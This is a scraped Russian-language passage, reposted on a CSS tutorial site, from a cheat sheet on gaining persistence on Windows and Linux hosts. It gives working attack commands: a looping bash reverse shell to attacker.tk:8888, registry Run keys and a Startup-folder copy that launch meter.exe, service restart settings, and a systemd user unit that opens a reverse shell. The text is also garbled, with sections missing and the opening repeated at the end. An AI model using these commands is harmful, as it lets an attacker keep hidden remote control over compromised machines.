Шпаргалка по persistence. Как надежно прописаться на хосте или выявить факт компрометации - «Новости» » Самоучитель CSS
Меню
Наши новости
Учебник CSS

Невозможно отучить людей изучать самые ненужные предметы.

Введение в CSS
Преимущества стилей
Добавления стилей
Типы носителей
Базовый синтаксис
Значения стилевых свойств
Селекторы тегов
Классы
CSS3

Надо знать обо всем понемножку, но все о немногом.

Идентификаторы
Контекстные селекторы
Соседние селекторы
Дочерние селекторы
Селекторы атрибутов
Универсальный селектор
Псевдоклассы
Псевдоэлементы

Кто умеет, тот делает. Кто не умеет, тот учит. Кто не умеет учить - становится деканом. (Т. Мартин)

Группирование
Наследование
Каскадирование
Валидация
Идентификаторы и классы
Написание эффективного кода

Самоучитель CSS

Вёрстка
Изображения
Текст
Цвет
Линии и рамки
Углы
Списки
Ссылки
Дизайны сайтов
Формы
Таблицы
CSS3
HTML5

Новости

Блог для вебмастеров
Новости мира Интернет
Сайтостроение
Ремонт и советы
Все новости

Справочник CSS

Справочник от А до Я
HTML, CSS, JavaScript

Афоризмы

Афоризмы о учёбе
Статьи об афоризмах
Все Афоризмы

Видео Уроки


Наш опрос



Наши новости

       
7-03-2021, 00:00
Шпаргалка по persistence. Как надежно прописаться на хосте или выявить факт компрометации - «Новости»
Рейтинг:
Категория: Новости

Autoruns, резуль­таты ты можешь наб­людать на скрин­шотах.
 

Шелл


Ор­ганизо­вать пер­систен­тность мож­но пря­мо из коман­дной стро­ки. Что­бы шелл откры­вал­ся всег­да, исполь­зуем коман­ду с бес­конеч­ным цик­лом, ухо­дящую в фон.


Windows

Вот как это работа­ет в Windows:



Linux
bash$> nohup bash -c "while :; do bash -i & /dev/tcp/attacker.tk/8888 0>&1; sleep 60; done" &


  • Плю­сы: управля­емый интервал запус­ка, подой­дет любой поль­зователь.


  • Ми­нус: не пережи­вет перезаг­рузку.


 

Автозагрузка


Го­воря о пер­систен­тнос­ти, нель­зя прой­ти мимо клас­сичес­кой и всем извес­тной авто­заг­рузки. Ее пре­иму­щес­тво в том, что она будет работать с пра­вами любого, даже неад­минис­тра­тив­ного поль­зовате­ля.


Windows
cmd$>reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionRun"/v persistence /t REG_SZ /d "C:usersusernamemeter.exe"cmd#>copy meter.exe C:ProgramDataMicrosoftWindowsStart MenuProgramsStartupcmd#>reg add "HKLMSoftwareMicrosoftWindowsCurrentVersionRun"/v persistence /t REG_SZ /d "C:Windowssystem32meter.exe"
Linux


  • Плю­сы: пережи­вает перезаг­рузку, подой­дет любой поль­зователь.


  • Ми­нус: неуп­равля­емый интервал запус­ка.


 

Сервисы


Ис­поль­зовать служ­бу для зак­репле­ния более выгод­но, чем авто­заг­рузку, так как Service Manager будет сам переза­пус­кать служ­бу, если пот­ребу­ется.


Для Windows соз­дание служ­бы пот­ребу­ет пра­ва адми­нис­тра­тора.


cmd#>sc failure persistence reset= 0 actions= restart/60000/restart/60000/restart/60000
cmd#> sc start persistence

В Linux соз­дать служ­бу мож­но и с учет­ки прос­того поль­зовате­ля. Вот вари­анты для рута и для прос­того поль­зовате­ля.


bash$> vim ~/.config/systemd/user/persistence.service

Со­дер­жимое фай­ла:


[Unit]
Description=persistence
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/attacker.tk/8888 0>&1'
Restart=always
RestartSec=60
[Install]
WantedBy=default.target

И запус­каем соз­данную служ­бу:


bash#> systemctl start persistence.service
bash$>systemctl --user enable persistence.service
bash$>systemctl --user start persistence.service


  • Плю­сы: пережи­вает перезаг­рузку, управля­емый интервал запус­ка, под­ходит любой поль­зователь.


  • Ми­нус: необ­ходимы пра­ва адми­нис­тра­тора.


 

Задачи


Соз­дание зап­ланиро­ван­ной задачи — весь­ма удоб­ный спо­соб под­держа­ния дос­тупа. Заод­но мож­но задать вре­мя и интервал запус­ка. Но делать это раз­решено, как пра­вило, толь­ко при­виле­гиро­ван­ным поль­зовате­лям.


Autoruns, резуль­таты ты можешь наб­людать на скрин­шотах. Шелл Ор­ганизо­вать пер­систен­тность мож­но пря­мо из коман­дной стро­ки. Что­бы шелл откры­вал­ся всег­да, исполь­зуем коман­ду с бес­конеч­ным цик­лом, ухо­дящую в фон. Windows Вот как это работа­ет в Windows: Linux bash$

Теги: CSS

Просмотров: 680
Комментариев: 0:   7-03-2021, 00:00
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь. Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.

 
Еще новости по теме:



Другие новости по теме: